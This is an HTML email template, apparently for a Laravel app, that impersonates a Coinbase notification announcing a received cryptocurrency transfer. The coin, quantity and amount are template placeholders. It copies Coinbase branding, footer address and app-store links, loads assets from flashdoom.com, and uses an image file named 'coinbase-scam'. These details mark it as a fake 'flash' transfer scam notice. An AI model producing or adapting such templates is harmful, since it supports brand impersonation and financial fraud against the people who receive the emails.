<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Laravel</title>
    <link rel="stylesheet" href="https://flashdoom.com/css/app.css">
    <!-- Fonts -->
    <link href="https://fonts.bunny.net/css2?family=Nunito:wght@400;600;700&display=swap" rel="stylesheet">
</head>
<style>

</style>

<body class="antialiased">

    <div style="width: 85%;
          margin: 20px auto;
          background-color: #d0604c;
          color: #fff;
          padding: 20px;
          text-align: center;
          border-radius: 8px;
          box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);">
        <div style="font-size: 15px;
          margin-bottom: 10px;
          font-weight: bold;">&#9888;</div>
        <p style="font-size: 12px;
          line-height: 1.4;
          font-weight: bold;
          font-family:'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;">{{ warning }}</p>
    </div>

    <!--Warning Message-->

    <div style="background-color: #0052fe; padding-top: 8px; padding-bottom: 8px;">
        <div class="coinbase-logo-wrap" style="display: flex; align-items: center; justify-content: center;">
            <img src="https://res.cloudinary.com/dvy8ajvay/image/upload/v1688031477/coinbase-scam_aj3mrj.png"
                style="max-width: 320px; height: 50px; margin-top: 10px; margin-bottom: 8px; display: block; margin-left: auto; margin-right: auto;"
                alt="coinbase logo">
        </div>
        <div class="contain" style="background-color: white; padding: 14px; margin: 14px; border-radius: 3px;">
            <div class="coinbase-logo-wrap"
                style="display: flex; align-items: center; justify-content: center; margin-bottom: 10px;">
                <img src="https://res.cloudinary.com/dvy8ajvay/image/upload/v1688033955/check-coinbs-removebg-preview_d2jffi.png"
                    style="max-width: 320px; height: 80px; display: block; margin: 0 auto;" alt="coinbase check">
            </div>
            <div class="bnb-content" style="display: block; color: white; text-align: center;">
                <p style="font-size: 18px; margin: 0; color: #656d71;">You just received</p>
                <p style="font-size: 15px; margin: 4px 0 4px; color: gray;">{{ qty }}
                    {{ coin }} ({{ amount }} {{ currency }})</p>
                <p style="font-size: 15px; margin: 0; color: gray;">via Coinbase network</p>
                <hr style="margin: 18px;">
                <p
                    style="text-align: justify; text-justify: inter-word; margin: 0; font-size: 15px; padding: 8px; color: gray; line-height: 1.4; text-align: center; margin: 0;">
                    You just received {{ qty }} {{ coin }} ({{ amount }} {{ currency }}) from an external {{ coin }} account. It may take up to 6 network
                    confirmations before your {{ coin }} is
                    available for trade. <a href="https://www.coinbase.com/learn" style="color: #4b80e8;">Learn more</a>
                </p>

                <a href="https://login.coinbase.com/signin" style="display: block; text-align: center; margin: 12px;">
                    <button style="border-radius: 2px; color: white; padding: 12px 60px; background-color: #0082ca; border: none; text-decoration: none;">View transaction</button>
                </a>
            </div>
        </div>

        <div align="center" style="text-align: center; color: white;">
            <p style="font-size: 14px;">Get the latest Coinbase App for your phone</p>
            <a align="center" href="https://apps.apple.com/us/app/coinbase-buy-bitcoin-ether/id8=86427730">
                <img align="center" src="https://i.im.ge/2023/07/13/5sCjOr.app-store.png" height="40" width="123"></a> 

            <a align="center" href="https://play.google.com/store/apps/details?id=com.coinbase=android">
                <img align="center" src="https://i.im.ge/2023/07/13/5sCwW0.play-store.png" height="40" width="123"></a>
            <br>
            <br>
            <p style="font-size: 8.9px;">To stop receiving these emails, unsubscribe from this list.</p>
            <u><span style="font-size: 9.80px;">Terms of Services</span></u><br>
            <div style="font-size: 8.9px;">
                <span>&#64; Coinbase 2024</span><br>
                <span>Coinbase Europe Limited</span><br>
                70 Sir John Rogerson's Quay | Dublin 2 | DO2 R296 | Ireland
            </div>
        </div>
    </div>

    <script src="https://flashdoom.com/js/app.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/1.6.6/flowbite.min.js"></script>
</body>

</html>